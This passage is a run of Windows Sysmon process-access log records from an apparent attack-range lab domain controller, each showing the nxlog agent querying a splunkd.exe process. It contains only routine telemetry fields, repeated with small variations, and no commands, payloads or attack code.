{"EventTime":"2020-08-01 06:50:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2952,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:56.323\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:56.323","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2953,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:57.325\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:57.325","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2954,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:58.327\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:58.327","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2955,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:59.330\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:59.330","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2956,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:00.332\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:00.332","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2957,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:01.334\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:01.334","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2958,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:02.336\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 